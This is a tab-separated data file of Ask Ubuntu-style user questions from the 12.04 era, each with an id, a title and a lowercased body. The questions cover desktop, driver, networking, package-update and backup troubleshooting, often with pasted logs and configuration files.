139471	extract command from mogrify	i recently dicovered a command line picture editing tool imagemagick which has a tool called mogrify i would like someone to explain the -extract command ( see here if you need reference ) let me show you 'll what i did this is the original image i then made two copies of this ( using any command edits the original file ) to the first i used the command mogrify -extract 500x500+224+202 '/home/ashhab/desktop/abstract_wallpaper ( copy ) .jpg' then i get this for the second i used this command mogrify -extract 500x500 '/home/ashhab/desktop/abstract_wallpaper ( another copy ) .jpg' and i get this the command can be explained as $ mogrify -extract ( size ) ( offset ) [ file path ] so my question is what does the offset ( +224+202 ) actually do ? what does offset mean ?
139474	gui program to shred or wipe files with options to make sure they are unrecoverable ?	i have a quick question about file shredding . is there any application with graphical interface capable of shredding files and folders ? i know bleachbit has that feature but there are no options or configurations and i really ca n't know if the files are unrecoverable or not .
139475	package updates always download too much data	when i update ubuntu ( either with apt-get update or using the gui-based check for updates ) , it downloads a large amount of data , 19.xx mb every time , and often takes an unusually long time to to check . this behavior did n't exist in 11.10 , or in 11.04 ( or in mint ) -- in earlier versions , it seemed to check intelligently for updates , and only download what was necessary . the initial update would download the whole 19mb or so , but subsequent updates were only about 2 to 3 mb . if no packages were updated , nothing would be downloaded . but since upgrading to 12.04 , every time i update , it downloads 19mb ( meaning that it seems to start from scratch every time ) ... . is there a database or cache problem , or something else that i can check to correct this ?
139479	the off button eliminated in the right corner of above in ubuntu 12.04 ( unity )	i always have used unity and i have never had any problem , but now that i reinstated ubuntu 12.04 , but when it had stopped using her on having extinguished it i saw that unity 's off button was not , it is possible to extinguish of other forms like that that i her restarted to see if it was corrected but till now i continue with the same problem , some programs that i installed were ubuntu tweak and the interior decorator of windows emerald , not if the problem is for one of these things . how can i solve it ?
139481	can not connect to open wifi hotspot created by android	i 'm trying to share my 3g data connection via wifi hotspot . i have an open hotspot running on my phone ( xperia neo v - mt11i - android 2.3.4 ) . but i can not connect to it from my ubuntu system . here is the syslog while i try to connect to it - networkmanager [ 1077 ] : < info > activation ( wlan0 ) starting connection 'theneo' networkmanager [ 1077 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 1077 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 1077 ] : < info > activation ( wlan0/wireless ) : connection 'theneo ' requires no security . no secrets needed . networkmanager [ 1077 ] : < info > config : added 'ssid ' value 'theneo' networkmanager [ 1077 ] : < info > config : added 'scan_ssid ' value '1' networkmanager [ 1077 ] : < info > config : added 'key_mgmt ' value 'none' networkmanager [ 1077 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 1077 ] : < info > config : set interface ap_scan to 1 networkmanager [ 1077 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) networkmanager [ 1077 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating kernel : [ 17498.113553 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17498.310138 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17498.510069 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17498.710083 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17504.779927 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17504.976420 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17505.176379 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17505.376314 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17511.478385 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17511.674738 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17511.874655 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17512.074659 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17518.152643 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17518.349064 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17518.549051 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17518.748999 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17524.858896 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17525.055404 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17525.255387 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17525.455254 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17531.589176 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17531.785747 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17531.985724 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17532.185610 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17538.329257 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17538.528003 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17538.728024 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17538.927922 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17545.022036 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17545.218339 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17545.418319 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17545.618206 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out wpa_supplicant [ 29352 ] : trying to authenticate with 5c : b5:24:2f : d1:2f ( ssid='theneo ' freq=2462 mhz ) kernel : [ 17551.724177 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 1/3 ) kernel : [ 17551.920685 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 2/3 ) kernel : [ 17552.120597 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f ( try 3/3 ) kernel : [ 17552.320526 ] wlan0 : direct probe to 5c : b5:24:2f : d1:2f timed out networkmanager [ 1077 ] : < warn > activation ( wlan0/wireless ) : association took too long , failing activation . networkmanager [ 1077 ] : < info > ( wlan0 ) : device state change : config - > failed ( reason 'supplicant-timeout ' ) [ 50 120 11 ] networkmanager [ 1077 ] : < warn > activation ( wlan0 ) failed for access point ( theneo ) networkmanager [ 1077 ] : < warn > activation ( wlan0 ) failed . networkmanager [ 1077 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 1077 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] networkmanager [ 1077 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > disconnected networkmanager [ 1077 ] : < warn > could n't disconnect supplicant interface : this interface is not connected . why is direct probe to 5c : b5:24:2f : d1:2f timed out ? any idea ?
139482	can not login to user with encrypted directory	i unknowingly deleted the .ecrypts directory while reinstalling ubuntu 12.04 . i created a default user by the same name while installing the new version . however , i could n't login to the user after installation . after some advices , i was finally able to see the access-your-private-data.desktop and readme.txt files in the user 's home directory , but i could n't still log into it . is there any way to recover the deleted encrypted files . also , would it be wise to delete the .ecryptfs directory of a user i have already deleted and have no need for ?
139484	freeze after startup	i just installed ubuntu 12.04 on my computer . at first it worked just fine , but when i started updating the system just `` updated '' the screen , and then freezed . same thing happens when i log in . any tip ?
139486	lightdm wo n't start unity automatically	the problem i have is that after i have entered my username and password , all i get is a blank desktop . no launcher and i am unable to click anything . after some googling around , i switch to a console ( alt-f1 ) and run unity -- replace . i then switch back to x console , and unity is running fine , and i can confirm it is unity-3d that is running ( i am typing this from one of these manual sessions ) . so , in desperation , i tried to install gdm instead . gdm seems to work , i.e . after login i get my desktop with launcher , but it is unity-2d and not unity-3d - even though the session is ubuntu and not ubuntu 2d . so , how do i go about getting lightdm to automatically start unity-3d properly ? some further info : if i switch to the discrete graphics card in catalyst control centre , then the problem goes away ( but my battery life drops drastically , and fans spin continuously ) . i am not sure what info you need to help me out ... all i can tell you is that i have a laptop with switchable graphics . the 'onboard ' graphics is an intel hd3000 and the 'discrete ' is a radeon 6770m . i use the onboard graphics ( set via catalyst control centre ) as it eats a lot less battery .
139491	how to change from gdm to lightdm ?	i 've upgraded to 12.04 . my upgrade did n't go as expected ; x crashed at the middle of the upgrade . i had to install many packages manually . this left me with a gdm login screen . how do i change from gdm to lightdm ?
139494	ubuntu software center is running slow on 12.04	similar to this post ( why is software slow to install using ubuntu software center ? ) installing software on my laptop is taking forever . i rarely get speeds faster than about 20 kb/sec . i tried sudo apt-get -- purge -- reinstall install software-center as suggested in why is software slow to install using ubuntu software center ? but that did not speed things up for me . just updating the packages via sudo apt-get update is taking way longer than it should . i was at home when i first had this issue , now i 'm on a college campus with good internet , and it is still very slow
139495	how do i control where my firefox downloads go ?	i am downloading ubuntu 12.04 from an 11.10 livecd , connected to the internet via tethering to a smartphone . ( please do n't ask why ... ) i have discovered that i have not enough space to download it to my downloads on the cd . how do i make the download go to my micro sd card ? ( yes , i have it mounted already . )
139501	hp cp2025 prints off center , how do i fix it ?	i recently installed ubuntu 12.04 and have an issue with my hp printer printing off center . every application i 've tried both libreoffice and the pdf application , both print pages with the left and top margins cut short . this leads me to believe that this might be a printer driver issue . is anyone else having this problem , or know how to fix it ?
139505	ca n't access ubuntu 12.04 ( black screen appears when trying to login )	this is the first time for me installing ubuntu and i 'm living a nobe 's nightmare ever since i installed it next to windows 7 and then used easybcd to add ubuntu 12.04 to windows boot manager everything till that point was just fine but then when i try to boot up and after going through the purple blanc screen i turn up to a completely black screen with one thin line on top of it ( i can hardly see the mouse cursor as i move it through that line ) i tried logging in in low resolution mode ( sorry if i misspelled the name ) and i got a message saying `` your system is running in low-graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' i clicked ok and then i was able to login but using a very poor resolution . i ca n't change to my actual resolution and the problem with the black screen is still happening when trying to login normally my system specs : intel core 2 duo 2.6ghz e7300 sapphire hd 6850 8 gb of a-data ram g41m combo motherboard please any help will be much appreciated
139510	where 's the `` flash tray icon on new message '' feature in pidgin ?	i 've had this feature before , but in 12.04 i ca n't seem to find it . i 've tried installing the pidgin-plugin-pack , but no luck . if anyone knows about a plugin with this feature , please do tell ! thank you .
139511	would my files still be safe if something went wrong with my computer ?	just curious about ubuntu one- for example , if one day , my computer would n't be able to boot , would everything be backed up safely ? or if my hard drive became fried or whatever- would it still be safe , or would it realize the files were gone and delete them from the cloud ?
139517	vncserver in rc.local will not run at boot	i 'm using /etc/rc.local and here is the current contents : okay , for some reason the formatting here is n't making a codeblock and instead is making everything bold and 3x the size . those who are able , please feel free to edit the post and change this - however for now i 'll have to use pastebin links . http : //pastebin.com/8x5l8igz ( rc.local contents ) http : //pastebin.com/6rvrmkic ( /root/vpsinfinity/vncboot file ) if i run /root/vpsinfinity/vncboot by itself , everything works fine . if i reboot , /root/vpsinfinity/vncboot runs as the myfile.txt has a log written to it - but the vncserver command is not run . i never get a log from rc.local to myfile.txt any help would be appreciated , i 've spent far too much time on this already and read everything google has thrown at me .
139519	when trying to check for any updates , why is it taking so long to update the sources ?	every time i try to update it takes forever to update the sources to see if any updates are available . the last update i got was one the update manager then all i get is source update that seems to take forever..
139528	ca n't log in to ubuntu 12.04	i ca n't log in to my ubuntu 12.04 . once i login i got returned back to the original screen after a trial to enable x11 forwarding . can you help me with this .
139535	unable to boot windows 7 after installing ubuntu to macbook with os x & windows 7 ( bootcamp )	i had lion osx partitioned with windows 7 using bootcamp [ on my macbook ] . i downloaded and installed ubuntu last night and it went well . until this morning when i tried to boot up windows 7 and it took me to ubuntu instead . i saw the windows 7 loader so i clicked on that . it brought me to a black screen with a white cursor in the top left . this is what windows usually looks like when it boots but this time it just stayed on the black screen . i also tried holding option and choosing the windows drive manually but it brought me back to ubuntu . i think what happened was that i did not click on the windows 7 loader when installing ubuntu 12.04 last night . what can i do to fix this ?
139537	managing ipod playlists ?	ok , i know very similar questions have been asked before . but i have searched for the last week , and can not figure out how to manage ipod playlists on ubuntu 12.04 64-bit . all the `` usual suspects '' ( rhythmbox , banshee , amarok , etc . ) are completely unable to edit/create/delete ipod playlists correctly . the only program i 've ever had any success with was gtkpod , which is unusable on 12.04 64-bit . so what options do i have ? i have a 4th generation video ipod ( sort of old ) . the default music player , rhythmbox , seems to put playlists on the ipod , but all it does is append . so adding one file to a playlist causes rhythmbox to double every other file in the playlist ! is it truly impossible to use both ubuntu 12.04 64-bit and have a manageable ipod ? thanks !
139539	terminal in geany	i just installed ubuntu 12.04 , i am a big fan of geany , but now i do n't have the terminal at the base of the window . i have tried to change the terminal preferences , without success . any ideas ?
139547	arcam rpac usb sound card not working on ubuntu 12.04	i 've just bought an arcam rpac external usb sound device , and after a lot of hours spent , i just ca n't get it to work on ubuntu 12.04 64bit setup . it uses a ti pcm5102 dac chipset with asynchronous usb . i do n't think there 's a need for a special driver for it , as the rpac works fine on windows/mac os x using the generic usb driver . when i plug it in , i find the following in syslog : may 19 19:31:11 ubuntubox kernel : [ 179.096403 ] usb 1-1.2 : new full-speed usb device number 5 using ehci_hcd may 19 19:31:14 ubuntubox pulseaudio [ 1678 ] : [ pulseaudio ] alsa-util.c : unable to load mixer : invalid argument may 19 19:31:14 ubuntubox kernel : [ 182.207155 ] 5:1:1 : usb_set_interface failed there are loads of those usb_set_interface failed lines . later on , i get the following when i use aplay -l to query it , i get more : may 19 19:33:06 ubuntubox kernel : [ 294.021946 ] 6:1:1 : usb_set_interface failed may 19 19:33:06 ubuntubox pulseaudio [ 2264 ] : [ pulseaudio ] module-alsa-card.c : failed to find a working profile . may 19 19:33:06 ubuntubox pulseaudio [ 2264 ] : [ pulseaudio ] module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 1 '' name= '' usb-arcam_arcam_usb_audio_1.0_0000-00-a10 '' card_name= '' alsa_card.usb-arcam_arcam_usb_audio_1.0_0000-00-a10 '' namereg_fail=false tsched=yes ignore_db=no deferred_volume=yes card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . may 19 19:33:06 ubuntubox pulseaudio [ 2264 ] : [ pulseaudio ] module-udev-detect.c : tried to configure /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/sound/card1 ( alsa_card.usb-arcam_arcam_usb_audio_1.0_0000-00-a10 ) more often than 5 times in 10s running lsusb gives the following line for the rpac : bus 001 device 007 : id 25c4:0003 typing aplay -l gives the following -- see card 1 below : card 0 : pch [ hda intel pch ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : a10 [ arcam usb audio 1.0 ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 so the rpac device is obviously alive and recognized by some part of ubuntu . furthermore , the led on the rpac turns green from red when connected , indicating that it 's activated . so far , i 've tried adding the following line to /lib/udev/rules.d so that libmtp ( i 'm on libmtp9 , by the way ) might recognize it : # arcam rpac attr { idvendor } == '' 25c4 '' , attr { idproduct } == '' 0003 '' , symlink+= '' libmtp- % k '' , mode= '' 660 '' , group= '' audio '' , env { id_mtp_device } = '' 1 '' , env { id_media_player } = '' 1 '' i also tried changing /usr/share/alsa/alsa.conf to give it a specific hardware slot ( slot 1 ) . but firstly , i get the following error : can not find the slot for index 1 ( range 0-29 ) , error : -16 and secondly , the rpac light remains at red . so i 've backed out my changes to alsa.conf . if anyone 's got any bright ideas , i 'd very much appreciate it ! i 'm spending too much time banging my head against a brick wall ! thanks , james .
139551	how can i install rhythmbox in xubuntu without nautilus ?	i notice that when i try to install rhythmbox in xubuntu 12.04 , it seems to depend on gnome desktop and nautilus , neither of which i want . sudo apt-get install rhythmbox [ sudo ] password for mark : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gir1.2-gst-plugins-base-0.10 gir1.2-gstreamer-0.10 gir1.2-peas-1.0 gir1.2-rb-3.0 gnome-desktop3-data libdiscid0 libdmapsharing-3.0-2 libexempi3 libgnome-desktop-3-2 libmusicbrainz3-6 libpeas-1.0-0 libpeas-common librhythmbox-core5 nautilus nautilus-sendto python-mako python-markupsafe rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-plugins suggested packages : eog gnome-sushi pidgin gajim python-beaker python-mako-doc gnome-control-center the following new packages will be installed gir1.2-gst-plugins-base-0.10 gir1.2-gstreamer-0.10 gir1.2-peas-1.0 gir1.2-rb-3.0 gnome-desktop3-data libdiscid0 libdmapsharing-3.0-2 libexempi3 libgnome-desktop-3-2 libmusicbrainz3-6 libpeas-1.0-0 libpeas-common librhythmbox-core5 nautilus nautilus-sendto python-mako python-markupsafe rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-plugins 0 upgraded , 23 newly installed , 0 to remove and 0 not upgraded . need to get 3,688 kb of archives . after this operation , 15.0 mb of additional disk space will be used .
139555	how can i programmatically get the pid of the active gnome terminal instance ?	how can i get the pid of the gnome terminal instance i 'm using from within a bash script ? i can run xprop _net_wm_pid and then manually click the terminal window , but i 'd like to completely automate this .
139563	12.04 booting hangs on boot screen	i 'm a newbe in ubuntu and i 'm trying to install 12.04 . neither the live cd nor the live usb helped me to do so . whether i try to run or install from cd or usb , the loading screen stops on ubuntu logo screen , the one with the loading dots . once the boot screen reaches this point the dots stop moving ( loading ) . do you please have any suggestions ?
139565	nvidia card driver not detected : no settings & can not use hdmi	i have an hp pavilion dm3-1120eb laptop with an nvidia geforce g105m graphic card , running a fresh ubuntu 12.04 precise pangolin install . when connecting to a new samsung s23b550 23 inch lcd monitor the hdmi will not work and the vga connection will not allow for 1920*1080 resolution . the result is a small resolution ( 1024*768 ) that does not look good ( fuzzy ) and i can not watch youtube videos ( the video box keeps on moving to the right and back ) and the same flickering effect happens with droping menus and google 's suggestion box . i 've tried multiple solutions sugested in posts with no good result ( including installing the drivers downloaded from the nvidia page ) . as far as i can guess , the problem is that the nvidia card is present but not recognized and thus the drivers do not work . originally the drivers were installed ( nvidia-current and the rest , all updated ) , but could not configure them with nvidia-config ( says driver not present ) and they did not show up with jockey-gtk . there 's also been an error message about glx not being present either . screenshot for the hdmi the monitor says that there 's no signal of mhl is not installed . the computer is running now with no nvidia drivers and no xorg.conf file ( it gives me the best resolution ) . vga will not even recognize the monitor as a 16:9 . this is the result of xrandr : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 8192 x 8192 lvds2 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0* 800x600 60.3 56.2 640x480 59.9 vga2 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) lspci -v ( only section about vga ) : 01:00.0 vga compatible controller : nvidia corporation g98m [ geforce g105m ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 142e flags : bus master , fast devsel , latency 0 , irq 16 memory at f0000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 4000 [ size=128 ] expansion rom at f1080000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau kernel modules : nvidia , nouveau , nvidiafb last xorg.conf ( now removed ) : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.40 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) thu apr 5 22:40:54 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection nvidia-settings error : ! [ nvidia-settings error ] [ 2 ] lshw -c video : *-display description : vga compatible controller product : g98m [ geforce g105m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f0000000-f0ffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport:4000 ( size=128 ) memory : f1080000-f10fffff *-display description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f1400000-f17fffff memory : e0000000-efffffff ioport:50f0 ( size=8 )
139570	how do i remove all metadata from a quicktime movie file ?	my camera takes .mov files as movies . how can i remove all metadata from them so i can feel confident sharing them on youtube without accidentally sharing when/where they were filmed , what type of camera i have , etc . a command line one-liner is nice , but if it 's too confusing , a gui program would be better .
139575	ca n't use cut/copy/move/ on desktop	i 'm using 12.04 . i recently noticed that i ca n't copy/cut/move files on the desktop , unless i open nautilus and go to the desktop folder to complete the actions .
139579	ca n't install ubuntu 12.04 64-bit in vmware or virtualbox on windows 7 64-bit system	i need help ! i just got a new 64-bit system and want to run ubuntu 12.04 64-bit in vmware or virtualbox , not sure the difference between the two so does n't matter there . anyway , i had no problems installing ubuntu 32-bit in vmware . runs fine but wa n't to try the 64-bit to see if it 's noticeably faster . i 've tried in both vmware and virtualbox using cd , dvd , usb and .iso but all seem to freeze up during install . i 've waited upwards of 4 hours to see what happens , maybe more . does anyone out there have any ideas what 's going wrong ? is it possible that i 'm downloading corrupted iso from ubuntu download site ? i 've downloaded a few different times but makes no difference . please help ! i 'm really anxious to see what this new machine can do .
139582	software center installing slowly and failures on upgrades	my update center has started saying `` package broken '' . it looked like it was vlc so i ran sudo apt-get update , also uninstalled vlc . for hours it worked and now when i download an app in software center it installs so slowly i just cancel it . in the update center when it 's updating the cache it never gets done . does anyone know how to fix this ? it seems it happened after the last updates . also after uninstalling vlc if i tried to get it from software center it said package broken , but installing it from a terminal works . i 've tried update and upgrade from terminal and also did a partial upgrade . *update*this morning i got up and opened the update center.ihad 3 updates in there so i clicked check for updates and it said waiting for apt-get to close.i then closed out and reopened and trying to update cache was still slow.so i decided to try and install the updates already there and the pic attached is what i got.i dont know if you can read it well but the error has something to do with python sso client here
139585	logging wireless access point connections	is there a way to find timestamps of when i connected/disconnected to wireless networks ( so i can see where i was at some point in the past ) ? i ca n't seem to find any log files with this information ( and my system does n't seem to save logs older than about a month , anyway ) . if no such log file exists , it possible to write a script that will do this for me ? thanks ! p.s . i 'm running ubuntu 10.04 .
139589	how can i install textwrap plugin in gedit ?	i followed a guide to install text wrap in gedit . tried to get standard error feedback by starting from a terminal . but could n't get it installed . would there be a problem with 12.04 having gone python 2.7 ? other suggestions ? i had the same problem earlier in 11.10 .
139593	how to get a hp wi-fi touch mouse x7000 working ?	i recently bought a very expensive 60 dollar wireless mouse . this mouse connects to a wireless network card , instead of using a usb dongle . i ca n't get this to work in ubuntu 12.04 . and i do n't want to return it . how can i get it too work ?
139596	12.04 stuck during installation `` processing triggers for update-notifier-common ''	everything is working fine till the end on installation where ubuntu stuck on ubuntu ubiquity : processing triggers for update-notifier-common . waited for more than 10 minutes and nothing , it stuck there .
139598	how to change directory ?	i 've downloaded your-freedom in home /local/freedom i need steps of how to go there in terminal as to launch the software please ! am a beginner in ubuntu so could you please help ?
139602	my apt-get update is taking too much and finally error ?	i was trying apt-get update but from an over night wait i found this ! ! also my software centre is showing , when i click some software to install it shows it is from multiverse source or something and when i click to `` use the source '' it shows updating catch and goes and goes and actually no data transfer use ... . ? ? ? ?
139611	how can i remove icons from menus of qt apps ?	vlc , skype , clementine and virtualbox ( the four qt apps i use ) all have icons in their menus . the rest of my system 's menus are all iconless , how i like them . i 'm using 12.04 .
139618	ubuntu one fails to sync home folder on lubuntu	i use lubuntu on one desktop and ubuntu on a laptop . dropbox is my main cloud syncing service but i have created an ubuntu one sso account in order to backup my home folders . at first , i was not able to use ubuntu one on lubuntu - after installing it from synaptics , when i tried to open it , nothing happens except opening a blank terminal window . i had to do this tweak to make it work on lubuntu : http : //ubuntuforums.org/showthread.php ? t=1949533 after i done this , the lubuntu bar icons became distinct and logon screen got somewhat misconfigured , having some non-existing usernames in there , but it still works fine so i did n't care much about it . now i can open ubuntu one client and sync files with the cloud service , but i have no option in context menu to sync any other folder in lubuntu . it only works if i add the files and folders to ubuntu one parent folder . worse than that , it is causing a failure with deja dup backup of my home folder . here it is what comes up on deja dup dialog every time i start lubuntu : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1403 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1396 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1247 , in main action = commandline.processcommandline ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/commandline.py '' , line 999 , in processcommandline globals.backend = backend.get_backend ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 158 , in get_backend return _backends [ pu.scheme ] ( pu ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 74 , in __init__ self.create_volume ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/backend.py '' , line 323 , in iterate return fn ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/duplicity/backends/u1backend.py '' , line 160 , in create_volume import ubuntuone.couch.auth as auth importerror : no module named couch.auth can anyone help me with this ? how can i make ubuntu one sync other folders on lubuntu ? and how to solve this error with deja dup backup ? any help would be much appreciated .
139621	should i exclude files when restoring /home folder from newer version ?	i 'm reverting to 10.04 from 11.10 ( unity ) . i have my entire /home folder backed up and plan to restore it to the new ( 10.04 ) system . are there any configuration files i should exclude because they will cause problems if i copy my current /home ( 11.10 ) to the /home in the older version ( 10.04 ) ? i 'm simply trying to avoid a problem with settings or configurations that are not backward compatible .
139627	could a normal desktop user create his/her own bootable disk ?	i ask this , because it would make my life a lot easier if i could have a bootable cd or usb stick with all my favorite applications , games , and codecs preinstalled .
139629	how can i disable ubuntu 12.04 's e-mail thing ?	i use g-mail . i do n't need ubuntu to boot up its own e-mail program , cramming up my boot times when i try to start my system ? how can i disable the e-mail program ?
